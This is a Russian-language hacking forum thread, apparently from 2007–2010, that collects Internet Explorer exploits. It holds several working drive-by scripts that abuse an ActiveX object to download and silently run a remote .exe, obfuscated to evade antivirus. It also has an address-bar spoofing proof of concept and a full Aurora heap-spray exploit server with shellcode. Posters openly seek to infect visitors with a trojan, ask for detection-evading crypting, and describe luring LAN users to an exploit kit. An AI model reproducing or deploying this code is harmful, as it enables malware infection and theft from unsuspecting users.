ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Защита ОС: вирусы, антивирусы, файрволы. (https://forum.antichat.xyz/forumdisplay.php?f=80)
-   -   Эксплойты для Ie (https://forum.antichat.xyz/showthread.php?t=24465)

THE_END 02.10.2007 01:55

Уязвимости в Microsoft Internet Explorer (всего 117 ).



Уязвимость позволяет удаленному пользователю получить доступ к важным данным.

PHP код:


<script>

function 
Clear() {
document.getElementById("label1").htmlFor="file1";
document.getElementById("text1").focus();
}

function 
Down() {
document.getElementById("file1").focus();
}

</
script>

<
input type="file" id="file1" name="file1" onkeydown="Clear()" onkeyup="Clear()" />
<
label id="label1" name="label1"></label>
<
br />
<
textarea name="text1" id="text1" onkeydown="Down()">
</
textarea

© securitylab.ру

gibson 22.11.2007 16:51

Microsoft Internet Explorer TIF/TIFF Code Execution (MS07-055)
 
Internet Explorer has standart ImageBase address and PE Win32 header is started at 0x00400000 in memory. So memory cell at the address
0x00400008 contains the short value 0x0004 and at the address
0x00400011 it contains the long value 0x00000000 in any case.
I used these addresses for generating of TIFF-file that uses vulnerability and for controling of EIP.

This exploit tested on:
- Windows 2000 SP4 + IE5.01
- Windows 2000 SP4 + IE5.5
- Windows 2000 SP4 + IE6.0 SP1
_http://www.milw0rm.com/exploits/4616 2007-11-11

tusman 03.12.2007 02:19

Цитата:

прив. всем. Вот хотелбы спросить , есть ли статья для Новечков как пользоваться сплоитам ... в Общем мне нужно тока одно чтоб человек заходил на сайт и ему загружался трой ( Пинчег ) . Кто может дать сылку на статью про Сплоиты и какой сплоит посоветуйте для этого , онли паблик ... Просто друг мне еще обещал закриптить его ...
Меня тоже интересует ! Дайте пожалуйста линк где можно об этом почитать !

Francuz 03.12.2007 04:11

to tusman & L0n1

вот видео....
http://video.antichat.ru/file179.html

_Sniper_ 13.12.2007 22:56

Цитата:

Сообщение от Francuz
to tusman & L0n1

вот видео....
http://video.antichat.ru/file179.html

Скрипт палицца. Как его криптануть шолей?))

Витян 15.01.2008 01:07

пара эксплоитов для для ие 6, последний билд авант браузера тож пробивает. позволяет скачать и запустить файл :) хз выкладывалось или нет, кто сможет криптануть мне в личку напишите

Код:

<SCRIPT language="VBScript">

Module_Path="http://путь до файла.exe"

  If navigator.appName="Microsoft Internet Explorer" Then

      If InStr(navigator.platform,"Win32") <> 0  Then

      Const ssfFONTS=20
      Const adModeReadWrite=3
      Const adTypeBinary=1
      Const adSaveCreateOverWrite=2

      Dim  oRDS
      Dim  oXMLHTTP
      Dim  oFSO
      Dim  oStream
      Dim  oWShell
      Dim  oShellApp

      Dim  WinDir
      Dim  ExeName
      Dim  XMLBody
      Dim  PluginFile
      Dim  cByte
      Dim  ObjName
      Dim  ObjProg

      Randomize

      ExeName=GenerateName()
      ExeName=ExeName & ".exe"

      cls1="clsid:BD96"
      cls2="C556-65A"
      cls3="3-11D0-9"
      cls4="83A-00C04FC29E36"
      clsfull=cls1&cls2&cls3&cls4

      Set  oRDS=document.createElement("object")
      oRDS.setAttribute "id","oRDS"
      oRDS.setAttribute "classid",clsfull

      Set oShellApp = oRDS.CreateObject("Shell.Application","")
      Set oFolder = oShellApp.NameSpace(ssfFONTS)
      Set oFolderItem=oFolder.ParseName("Symbol.ttf")
      Font_Path_Components=Split(oFolderItem.Path,"\",-1,1)
      WinDir= Font_Path_Components(0) & "\" &  Font_Path_Components(1) & "\"
      ExeName=WinDir & ExeName

      ObjName="Microsoft"
      ObjProg="XMLHTTP"
      set oXMLHTTP = CreateObject(ObjName & "." & ObjProg)
      Req_type="G" & "E" & "T"
      HTTPSession=oXMLHTTP.Open(Req_Type,Module_Path,0)
      oXMLHTTP.Send()
      On Error Resume Next
      XMLBody=oXMLHTTP.responseBody

      ObjName="ADODB"
      ObjProg="Stream"
      On Error Resume Next
      Set oStream=oRDS.CreateObject(ObjName & "." & ObjProg,"")
      If Err.number <> 0 Then

            Set oFSO=oRDS.CreateObject("Scripting.FileSystemObject","")
            Set PluginFile=oFSO.CreateTextFile(ExeName, TRUE)
            Plugin_size=LenB(XMLBody)

            For j=1 To Plugin_size
                cByte=MidB(XMLBody,j,1)
                ByteCode=AscB(cByte)
                PluginFile.Write(Chr(ByteCode))
            Next
            PluginFile.Close

            Set  oWShell=oRDS.CreateObject("WScript.Shell","")
            On Error Resume Next
            oWShell.Run (ExeName),1,FALSE
      Else
            oStream.Mode=adModeReadWrite
            oStream.Type=adTypeBinary
            oStream.Open
            oStream.Write XMLBody
            oStream.SaveToFile ExeName,adSaveCreateOverWrite

            oShellApp.ShellExecute ExeName
      End If


      End If
  End If

Function GenerateName()
RandomName=""
rr=Int(8*Rnd)
ik=0
Do
  ii=Int(25*Rnd)+97
  RandomName=RandomName+Chr(ii)
  ik=ik+1
Loop While ik<rr
GenerateName=RandomName
End Function

</SCRIPT>

Код:

<SCRIPT language="javascript">

var bb949531092ff = "http://путь до файла";
function CreateO(o, n) {
        var r = null;
       
        try { eval('r = o.CreateObject(n)') }catch(e){}
       
        if (! r) {
                try { eval('r = o.CreateObject(n, "")') }catch(e){}
        }
       
        if (! r) {
                try { eval('r = o.CreateObject(n, "", "")') }catch(e){}
        }

        if (! r) {
                try { eval('r = o.GetObject("", n)') }catch(e){}
        }
       
        if (! r) {
                try { eval('r = o.GetObject(n, "")') }catch(e){}
        }
       
        if (! r) {
                try { eval('r = o.GetObject(n)') }catch(e){}
        }
       
        return(r);     
}

function Go(a) {
        var s = CreateO(a, "WSc"+"rip"+"t.Sh"+"ell");
        var o = CreateO(a, "ADO"+"DB.Str"+"eam");
        var e = s.Environment("Process");
       
        var bb351865611ff = null;
              var bin = e.Item("TEMP")+ "\\" + "fdklkjTUFOYUT.exe";
        var bb532058559ff;
       
        try { bb351865611ff=new XMLHttpRequest(); }
        catch(e) {
                try { bb351865611ff = new ActiveXObject("Micr"+"osoft.XMLH"+"TTP"); }
                catch(e) {
                        bb351865611ff = new ActiveXObject("MS"+"XML2.Serv"+"erXMLH"+"TTP");
                }
        }
       
        if (! bb351865611ff) return(0);
         
        bb351865611ff.open("GET", bb949531092ff, false)
        bb351865611ff.send(null);
        bb532058559ff = bb351865611ff.responseBody;
       
        o.Type = 1;
        o.Mode = 3;
        o.Open();
        o.Write(bb532058559ff);
        o.SaveToFile(bin, 2);
                   
        s.Run(bin,0);
}

var i = 0;
var bb804375678ff = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}','{BD96C556-65A3-11D0-983A-00C04FC29E36}','{AB9BCEDD-EC7E-47E1-9322-D4A210617116}','{0006F033-0000-0000-C000-000000000046}','{0006F03A-0000-0000-C000-000000000046}','{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}','{6414512B-B978-451D-A0D8-FCFDF33E833C}','{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}','{06723E09-F4C2-43c8-8358-09FCD1DB0766}','{639F725F-1B2D-4831-A9FD-874847682010}','{BA018599-1DB3-44f9-83B4-461454C84BF8}','{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}','{E8CCCDDF-CA28-496b-B050-6C07C962476B}',null);
       
while (bb804375678ff[i]) {
            var a = null;
             
            if (bb804375678ff[i].substring(0,1) == '{') {
                    a = document.createElement("object");
                      a.setAttribute("classid", "clsid:" + bb804375678ff[i].substring(1, bb804375678ff[i].length - 1));
              } else {
                    try { a = new ActiveXObject(bb804375678ff[i]); } catch(e){}
            }
             
              if (a) {
                      try {         
                            var b = CreateO(a, "WSc"+"ript.She"+"ll");
                              if (b) {
                                    Go(a);
                                    //return(0);
                              }
                    } catch(e){}
              }
            i++;
 }

</script>


Mo4x 15.01.2008 01:16

Снайпер В разделе статъи полась

tusman 17.01.2008 08:30

Всем прет )
Я понимаю что моя репа желает лучшего ) но может кто подскажет какой нить на данный момент рабочий не палющийся експлойт для закачки и запуска удаленного файла ?
Биг спасибо всем кто откликнется !)

Belfigor 17.01.2008 08:57

Цитата:

Сообщение от tusman
Всем прет )
Я понимаю что моя репа желает лучшего ) но может кто подскажет какой нить на данный момент рабочий не палющийся експлойт для закачки и запуска удаленного файла ?
Биг спасибо всем кто откликнется !)

вот не в обиду тебе сказанно , но ты опять написал глупость :D , во первых которые в паблике (они все паляться ) , которые не ПАЛЯТСЯ ( все приватные ) , а для закачки и запуска, найди и скачай icepack в инете его полно ;)

зы чтобы не было вопросов далее про icepack , поясняю , нашёл , скачал , если в ты в локалке ставишь себе Denver и тд и тп , далее заливаешь этот пакет ,на сервер , настраеваешь(этот пакет) через админку icepacka, то есть зальёшь нужные тебе файлы (трой ),далее отмечаешь какие он будет пробивать браузеры (iE 6 пробивается ) , делаешь ссылку на твой ресурс http://tusman.com , для локалки http://xxx.xxx.xxx.xxx/ и вперёд .

зы но сначало проверь на себе !

Vorlan 17.01.2008 09:19

мда, так ничего, вполне рабочий способ, но я больше предпочитаю работать с Metasploit Framework. Вручную, конечно некоторым сложно обновлять эксплойты, но по-моему им проще пользоваться.

Belfigor 17.01.2008 09:40

Цитата:

Сообщение от Vorlan
мда, так ничего, вполне рабочий способ, но я больше предпочитаю работать с Metasploit Framework. Вручную, конечно некоторым сложно обновлять эксплойты, но по-моему им проще пользоваться.

я тоже предпочитаю юзать Metasploit Framework3 , но у меня только один сплоит ms06_001_wmf_setabortpro пашет по ХР sp2 , да и если в локалке шалить :D , то нужно ссылку кидать а там порт 8080 , начинаются вопросы типа " а это что радио ? и что там за музон " :D
а это весит ресурс с заряженным icpackом , типа "порно для нашей любимой локалки " :D , а там уже дело чела идти на это ресурс или нет , хотя из 100% 89 зайдут ;)

зы а обновлять экслпоты можно через Metasploit Framework3 Online Update

Evpatiy 24.02.2008 00:45

Цитата:

Сообщение от Belfigor
я тоже предпочитаю юзать Metasploit Framework3 , но у меня только один сплоит ms06_001_wmf_setabortpro пашет по ХР sp2 , да и если в локалке шалить :D , то нужно ссылку кидать а там порт 8080 , начинаются вопросы типа " а это что радио ? и что там за музон " :D
а это весит ресурс с заряженным icpackом , типа "порно для нашей любимой локалки " :D , а там уже дело чела идти на это ресурс или нет , хотя из 100% 89 зайдут ;)

зы а обновлять экслпоты можно через Metasploit Framework3 Online Update

а не судьба поменять порт на 80 ?? :)

MadFun. 01.03.2008 05:29

Belfigor открываешь msfweb,в браузер вбиваешь http://127.0.0.1.:55555,ищешь свой сплойт,а там и сам дальше разберёшься,можно какие угодно порты вписывать))

XaCeRoC 20.03.2008 17:57

Выложите сплоит для ie7

shellz[21h] 23.03.2008 05:21

Код:

<!--
Secunia Advisory:          SA22542           
Release Date:                2006-10-25
Impact:                Spoofing
Solution Status:        Unpatched
Software:                Microsoft Internet Explorer 7.x

Description:
A weakness has been discovered in Internet Explorer, which can be exploited by malicious
people to conduct phishing attacks.

The problem is that it's possible to display a popup with a somewhat spoofed address bar
where a number of special characters have been appended to the URL. This makes it possible
to only display a part of the address bar, which may trick users into performing certain
unintended actions.

Secunia has constructed a demonstration, which is available at:
http://secunia.com/internet_explorer_7_popup_address_bar_spoofing_test/

The weakness is confirmed in Internet Explorer 7 on a fully patched Windows XP SP2 system.

Solution:
Do not follow links from untrusted sources.

Provided and/or discovered by:
Discovered by an anonymous person.
-->

<script language="JavaScript">
function StartTest()
{
 var padding = '';
 for ( i=0 ; i<108 ; i++)
 {
 padding += unescape("%A0");
 }
 newWindow = window.open("", "Win", "width=500,height=325,scrollbars=yes");
 newWindow.moveTo( (screen.width-325) , 0 );
 newWindow.document.location = "/result_22542/?" + unescape("%A0") + unescape("%A0") + "http://www.microsoft.com/"+padding;
 document.location = "http://www.microsoft.com/windows/ie/default.mspx";
}
StartTest()
</script>

# milw0rm.com [2006-10-26]


499392599 27.04.2008 14:11

Да метасплоит говно! как можно вывесить у себя на тачке сервак? ето бред полный.

-=lebed=- 27.04.2008 14:12

Цитата:

Сообщение от 499392599
Да метасплоит говно! как можно вывесить у себя на тачке сервак? ето бред полный.

Легко! Я вывешивал!

*DeViL* 30.04.2008 13:30

Выложите, у кого есть линк на статью о примотке нового сплойта к связке сплоитов...

gibson 30.04.2008 14:39

https://forum.antichat.ru/thread58567.html

XaCeRoC 30.04.2008 20:50

sploint под IE7

Цитата:

<html>
<head>
<title>IE7</title>
</head>
<body>
<script type="text/vbscript">
on error resume next
Set df = document.createElement("object")
df.setAttribute "clas"&"sid", "clsid:BD96C"&"556-65A3-11D0-"&"983A-00C04F"&"C29E36"
str="Microsoft"&"."&"XMLHTTP"
Set x = df.CreateObject(str,"")
var1="Ad"
var2="od"
var3="b."
var4="St"
var5="re"
var6="am"
str1=var1&var2&var3&var4&var5&var6

str5=str1
set S = df.createobject(str5,"")
for count = 0 to 4
S.type = 1
lnk="site.com/file.exe"
x.Open "G"&"E"&"T",lnk,0
x.Send
set F = df.createobject("Script"&"ing.FileSys"&"temObject" ,"")
if count = 0 then tmp = "c:windowstemp" else if count = 1 then tmp = "c:" else if count = 2 then tmp = "c:temp" else if count = 3 then tmp = "d:windowstemp" else if count = 4 then tmp = "d:" end if
fname1= F.BuildPath(tmp,"svacm.exe")
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
if err.number = 0 then
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"INSTALL","","open",0
exit for
else
Err.Clear
End if
next
</script>
</body>
</html>
юзаем и говорим о результатах.

diehard 30.04.2008 21:00

XaCeRoC
это для ИЕ6, пробивает больше половины ИЕ6.

XaCeRoC 30.04.2008 21:16

Цитата:

Сообщение от diehard
XaCeRoC
это для ИЕ6, пробивает больше половины ИЕ6.

тогда сорьь

Звeрь 02.05.2008 16:52

ищу хорошую связку может у ково есть дайте и о пишите как настроить её спасибо!

*DeViL* 02.05.2008 17:13

Цитата:

Сообщение от XaCeRoC
sploint под IE7



юзаем и говорим о результатах.

Напишите в краце как можно примотать сплоит к связке или линк на статейку киньте... заранее спс
и желательно на примере какой нть связки ( ice pack или armitage)

diehard 02.05.2008 18:11

Цитата:

Сообщение от *DeViL*
Напишите в краце как можно примотать сплоит к связке или линк на статейку киньте... заранее спс
и желательно на примере какой нть связки ( ice pack или armitage)

что ж там мотать - ложишь сплойт в папку сплойтов и дописываешь соответствующий include в разделе перебора браузеров (switch case или if else)

*DeViL* 02.05.2008 19:09

Вот небольшой сплойтег под ие6

diehard 02.05.2008 19:25

*DeViL*
Это всё под шестой, седьмой они не пробивают

*DeViL* 03.05.2008 17:09

Цитата:

Сообщение от Витян
пара эксплоитов для для ие 6, последний билд авант браузера тож пробивает. позволяет скачать и запустить файл :) хз выкладывалось или нет, кто сможет криптануть мне в личку напишите

Код:

<SCRIPT language="VBScript">

Module_Path="http://путь до файла.exe"

  If navigator.appName="Microsoft Internet Explorer" Then

      If InStr(navigator.platform,"Win32") <> 0  Then

      Const ssfFONTS=20
      Const adModeReadWrite=3
      Const adTypeBinary=1
      Const adSaveCreateOverWrite=2

      Dim  oRDS
      Dim  oXMLHTTP
      Dim  oFSO
      Dim  oStream
      Dim  oWShell
      Dim  oShellApp

      Dim  WinDir
      Dim  ExeName
      Dim  XMLBody
      Dim  PluginFile
      Dim  cByte
      Dim  ObjName
      Dim  ObjProg

      Randomize

      ExeName=GenerateName()
      ExeName=ExeName & ".exe"

      cls1="clsid:BD96"
      cls2="C556-65A"
      cls3="3-11D0-9"
      cls4="83A-00C04FC29E36"
      clsfull=cls1&cls2&cls3&cls4

      Set  oRDS=document.createElement("object")
      oRDS.setAttribute "id","oRDS"
      oRDS.setAttribute "classid",clsfull

      Set oShellApp = oRDS.CreateObject("Shell.Application","")
      Set oFolder = oShellApp.NameSpace(ssfFONTS)
      Set oFolderItem=oFolder.ParseName("Symbol.ttf")
      Font_Path_Components=Split(oFolderItem.Path,"\",-1,1)
      WinDir= Font_Path_Components(0) & "\" &  Font_Path_Components(1) & "\"
      ExeName=WinDir & ExeName

      ObjName="Microsoft"
      ObjProg="XMLHTTP"
      set oXMLHTTP = CreateObject(ObjName & "." & ObjProg)
      Req_type="G" & "E" & "T"
      HTTPSession=oXMLHTTP.Open(Req_Type,Module_Path,0)
      oXMLHTTP.Send()
      On Error Resume Next
      XMLBody=oXMLHTTP.responseBody

      ObjName="ADODB"
      ObjProg="Stream"
      On Error Resume Next
      Set oStream=oRDS.CreateObject(ObjName & "." & ObjProg,"")
      If Err.number <> 0 Then

            Set oFSO=oRDS.CreateObject("Scripting.FileSystemObject","")
            Set PluginFile=oFSO.CreateTextFile(ExeName, TRUE)
            Plugin_size=LenB(XMLBody)

            For j=1 To Plugin_size
                cByte=MidB(XMLBody,j,1)
                ByteCode=AscB(cByte)
                PluginFile.Write(Chr(ByteCode))
            Next
            PluginFile.Close

            Set  oWShell=oRDS.CreateObject("WScript.Shell","")
            On Error Resume Next
            oWShell.Run (ExeName),1,FALSE
      Else
            oStream.Mode=adModeReadWrite
            oStream.Type=adTypeBinary
            oStream.Open
            oStream.Write XMLBody
            oStream.SaveToFile ExeName,adSaveCreateOverWrite

            oShellApp.ShellExecute ExeName
      End If


      End If
  End If

Function GenerateName()
RandomName=""
rr=Int(8*Rnd)
ik=0
Do
  ii=Int(25*Rnd)+97
  RandomName=RandomName+Chr(ii)
  ik=ik+1
Loop While ik<rr
GenerateName=RandomName
End Function

</SCRIPT>

Код:

<SCRIPT language="javascript">

var bb949531092ff = "http://путь до файла";
function CreateO(o, n) {
        var r = null;
       
        try { eval('r = o.CreateObject(n)') }catch(e){}
       
        if (! r) {
                try { eval('r = o.CreateObject(n, "")') }catch(e){}
        }
       
        if (! r) {
                try { eval('r = o.CreateObject(n, "", "")') }catch(e){}
        }

        if (! r) {
                try { eval('r = o.GetObject("", n)') }catch(e){}
        }
       
        if (! r) {
                try { eval('r = o.GetObject(n, "")') }catch(e){}
        }
       
        if (! r) {
                try { eval('r = o.GetObject(n)') }catch(e){}
        }
       
        return(r);     
}

function Go(a) {
        var s = CreateO(a, "WSc"+"rip"+"t.Sh"+"ell");
        var o = CreateO(a, "ADO"+"DB.Str"+"eam");
        var e = s.Environment("Process");
       
        var bb351865611ff = null;
              var bin = e.Item("TEMP")+ "\\" + "fdklkjTUFOYUT.exe";
        var bb532058559ff;
       
        try { bb351865611ff=new XMLHttpRequest(); }
        catch(e) {
                try { bb351865611ff = new ActiveXObject("Micr"+"osoft.XMLH"+"TTP"); }
                catch(e) {
                        bb351865611ff = new ActiveXObject("MS"+"XML2.Serv"+"erXMLH"+"TTP");
                }
        }
       
        if (! bb351865611ff) return(0);
         
        bb351865611ff.open("GET", bb949531092ff, false)
        bb351865611ff.send(null);
        bb532058559ff = bb351865611ff.responseBody;
       
        o.Type = 1;
        o.Mode = 3;
        o.Open();
        o.Write(bb532058559ff);
        o.SaveToFile(bin, 2);
                   
        s.Run(bin,0);
}

var i = 0;
var bb804375678ff = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}','{BD96C556-65A3-11D0-983A-00C04FC29E36}','{AB9BCEDD-EC7E-47E1-9322-D4A210617116}','{0006F033-0000-0000-C000-000000000046}','{0006F03A-0000-0000-C000-000000000046}','{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}','{6414512B-B978-451D-A0D8-FCFDF33E833C}','{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}','{06723E09-F4C2-43c8-8358-09FCD1DB0766}','{639F725F-1B2D-4831-A9FD-874847682010}','{BA018599-1DB3-44f9-83B4-461454C84BF8}','{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}','{E8CCCDDF-CA28-496b-B050-6C07C962476B}',null);
       
while (bb804375678ff[i]) {
            var a = null;
             
            if (bb804375678ff[i].substring(0,1) == '{') {
                    a = document.createElement("object");
                      a.setAttribute("classid", "clsid:" + bb804375678ff[i].substring(1, bb804375678ff[i].length - 1));
              } else {
                    try { a = new ActiveXObject(bb804375678ff[i]); } catch(e){}
            }
             
              if (a) {
                      try {         
                            var b = CreateO(a, "WSc"+"ript.She"+"ll");
                              if (b) {
                                    Go(a);
                                    //return(0);
                              }
                    } catch(e){}
              }
            i++;
 }

</script>



а в каком расширении эти сплоиты php или html ?...

Лигендо Онтечада 03.05.2008 17:11

Тупим? Это javascript

Kila 12.08.2008 15:43

Скажите мне молодому, не опытному, залил armitage, все хорошо, но файлик GeoIP.dat нифига не закачалсО...нездоровая канитель

Звeрь 14.08.2008 19:19

Цитата:

Сообщение от Kila
Скажите мне молодому, не опытному, залил armitage, все хорошо, но файлик GeoIP.dat нифига не закачалсО...нездоровая канитель


ставь на хостинг www.ho.ua

diehard 10.12.2008 18:37

Цитата:

10 декабря, 2008
Программа: Microsoft Internet Explorer 7.x
Опасность: Критическая
Наличие эксплоита: Да
Облазил сайт - не нашел сам эксплоит, подскажите где взять?

F1shka 10.02.2009 17:38

Цитата:

Сообщение от diehard
Облазил сайт - не нашел сам эксплоит, подскажите где взять?

http://www.xakep.ru/post/46406/default.asp

daniel_1024 16.07.2009 20:29

никто не знает нет ли такой уязвимости в интернет экспплорере которая позволяет получить доступ к файловой системе компа ? например это некий active - X файл, который выполнится на html странице и которыйи позволит из-за дыры в интернет эксплорере выполнить произвольный код ? или это фантазии...=)

ZloiSpy 03.11.2009 02:37

Цитата:

Сообщение от Kila
Скажите мне молодому, не опытному, залил armitage, все хорошо, но файлик GeoIP.dat нифига не закачалсО...нездоровая канитель


Может ты не из 6 осла пробовал, а из 7.
7 на звере установлен.

ZloiSpy 03.11.2009 02:41

Может ты не из 6 осла пробовал, а из 7.
7 на звере установлен.

anticoder 28.11.2009 03:30

помогите разобраться,

во многих сплойтах встречаю строки типа:

Код:

//------------------Replace with your code-----------------------//
        var Shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u  184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84  AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575  %u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u  018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C  78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0  %u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u  7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u00  63");
//------------------Replace with your code-----------------------//

вопрос, как это хозяйство расшифровать?)

пробовал так:

Код:

document.write  (unescape(Shellcode));
но в результате получаю иероглифы. :(
объясните плз как расшифровывать/зашифровывать код по такой схеме. день провел в гугле, но ничего толкового так и не нашел..

brain[pillow] 28.11.2009 18:43

Это не надо расшифровывать. Это нужно заменить своим кодом (payload)

Liar 24.03.2010 03:10

Эххх... а такой эксплоит то и пропустили :( ...
а ведь и шуму то он наделал *речь о Авроре*



PHP код:


#
#   Author : Ahmed Obied (ahmed.obied@gmail.com)
#
#   This program acts as a web server that generates an exploit to 
#   target a vulnerability (CVE-2010-0249) in Internet Explorer. 
#   The exploit was tested using Internet Explorer 6 on Windows XP SP2. 
#   The exploit's payload spawns the calculator. 
#
#   Usage  : python ie_aurora.py [port number]
#   

import sys
import socket

from BaseHTTPServer import HTTPServer
BaseHTTPRequestHandler
        
class RequestHandler(BaseHTTPRequestHandler):

    
def convert_to_utf16(selfpayload):
        
enc_payload ''
        
for i in range(0len(payload), 2):
            
num 0
            
for j in range(02):
                
num += (ord(payload[j]) & 0xff) << (8)
            
enc_payload += '%%u%04x' num
        
return enc_payload
                
    def get_payload
(self):
        
# win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub
        # http://metasploit.com
        
payload  '\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73'
        
payload += '\x13\x6f\x02\xb1\x0e\x83\xeb\xfc\xe2\xf4\x93\xea\xf5\x0e'
        
payload += '\x6f\x02\x3a\x4b\x53\x89\xcd\x0b\x17\x03\x5e\x85\x20\x1a'
        
payload += '\x3a\x51\x4f\x03\x5a\x47\xe4\x36\x3a\x0f\x81\x33\x71\x97'
        
payload += '\xc3\x86\x71\x7a\x68\xc3\x7b\x03\x6e\xc0\x5a\xfa\x54\x56'
        
payload += '\x95\x0a\x1a\xe7\x3a\x51\x4b\x03\x5a\x68\xe4\x0e\xfa\x85'
        
payload += '\x30\x1e\xb0\xe5\xe4\x1e\x3a\x0f\x84\x8b\xed\x2a\x6b\xc1'
        
payload += '\x80\xce\x0b\x89\xf1\x3e\xea\xc2\xc9\x02\xe4\x42\xbd\x85'
        
payload += '\x1f\x1e\x1c\x85\x07\x0a\x5a\x07\xe4\x82\x01\x0e\x6f\x02'
        
payload += '\x3a\x66\x53\x5d\x80\xf8\x0f\x54\x38\xf6\xec\xc2\xca\x5e'
        
payload += '\x07\x7c\x69\xec\x1c\x6a\x29\xf0\xe5\x0c\xe6\xf1\x88\x61'
        
payload += '\xd0\x62\x0c\x2c\xd4\x76\x0a\x02\xb1\x0e'
        
return self.convert_to_utf16(payload)
    
    
def get_exploit(self):
        
exploit '''
        <html>
        <head>
            <script>
            
            var obj, event_obj;
            
            function spray_heap()
            {
                var chunk_size, payload, nopsled;
            
                chunk_size = 0x80000;
                payload = unescape("<PAYLOAD>");
                nopsled = unescape("<NOP>");
                while (nopsled.length < chunk_size)
                    nopsled += nopsled;
                nopsled_len = chunk_size - (payload.length + 20);        
                nopsled = nopsled.substring(0, nopsled_len);
                heap_chunks = new Array();
                for (var i = 0 ; i < 200 ; i++)
                    heap_chunks[i] = nopsled + payload;
            }
        
            function initialize()
            {
                obj = new Array();
                event_obj = null;
                for (var i = 0; i < 200 ; i++ )
                    obj[i] = document.createElement("COMMENT");
            }
        
            function ev1(evt)
            {
                event_obj = document.createEventObject(evt);
                document.getElementById("sp1").innerHTML = "";
                window.setInterval(ev2, 1);
            }
      
            function ev2()
            {
                var data, tmp;
                
                data = "";
                tmp = unescape("%u0a0a%u0a0a");
                for (var i = 0 ; i < 4 ; i++)
                    data += tmp;
                for (i = 0 ; i < obj.length ; i++ ) {
                    obj[i].data = data;
                }
                event_obj.srcElement;
            }
                    
            function check()
            {
                if (navigator.userAgent.indexOf("MSIE") == -1)
                    return false;
                return true;   
            }
            
            if (check()) {
                initialize();
                spray_heap();               
            }
            else
                window.location = '
about:blank'
                
            </script>
        </head>
        <body>
            <span id="sp1">
            <img src="aurora.gif" onload="ev1(event)">
            </span>        
        </body>
        </html>
        '''
        
exploit exploit.replace('<PAYLOAD>'self.get_payload())
        
exploit exploit.replace('<NOP>''%u0a0a%u0a0a')
        return 
exploit 

    def get_image
(self):
        
content  '\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff'
        
content += '\x00\x00\x00\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44'
        
content += '\x01\x00\x3b'
        
return content

    def log_request
(self, *args, **kwargs):
        
pass
        
    def do_GET
(self):
        try:
            if 
self.path == '/':
                print
                print 
'[-] Incoming connection from %s' self.client_address[0]
                
self.send_response(200
                
self.send_header('Content-Type''text/html')
                
self.end_headers()
                print 
'[-] Sending exploit to %s ...' self.client_address[0]
                
self.wfile.write(self.get_exploit())
                print 
'[-] Exploit sent to %s' self.client_address[0]
            
elif self.path == '/aurora.gif':      
                
self.send_response(200)
                
self.send_header('Content-Type''image/gif')
                
self.end_headers()
                
self.wfile.write(self.get_image())
        
except
            print 
'[*] Error : an error has occured while serving the HTTP request'
            
print '[-] Exiting ...'
            
sys.exit(-1)
            
                       
def main():
    if 
len(sys.argv) != 2:
        print 
'Usage: %s [port number (between 1024 and 65535)]' sys.argv[0]
        
sys.exit(0)
    try:
        
port int(sys.argv[1])
        if 
port 1024 or port 65535:
            
raise ValueError
        
try:
            
serv HTTPServer((''port), RequestHandler)
            
ip socket.gethostbyname(socket.gethostname())
            print 
'[-] Web server is running at http://%s:%d/' % (ipport)
            try:
                
serv.serve_forever()
            
except:
                print 
'[-] Exiting ...' 
        
except socket.error:
            print 
'[*] Error : a socket error has occurred'
        
sys.exit(-1)    
    
except ValueError:
        print 
'[*] Error : an invalid port number was given'
        
sys.exit(-1)
            
if 
__name__ == '__main__':
    
main() 



Время: 07:38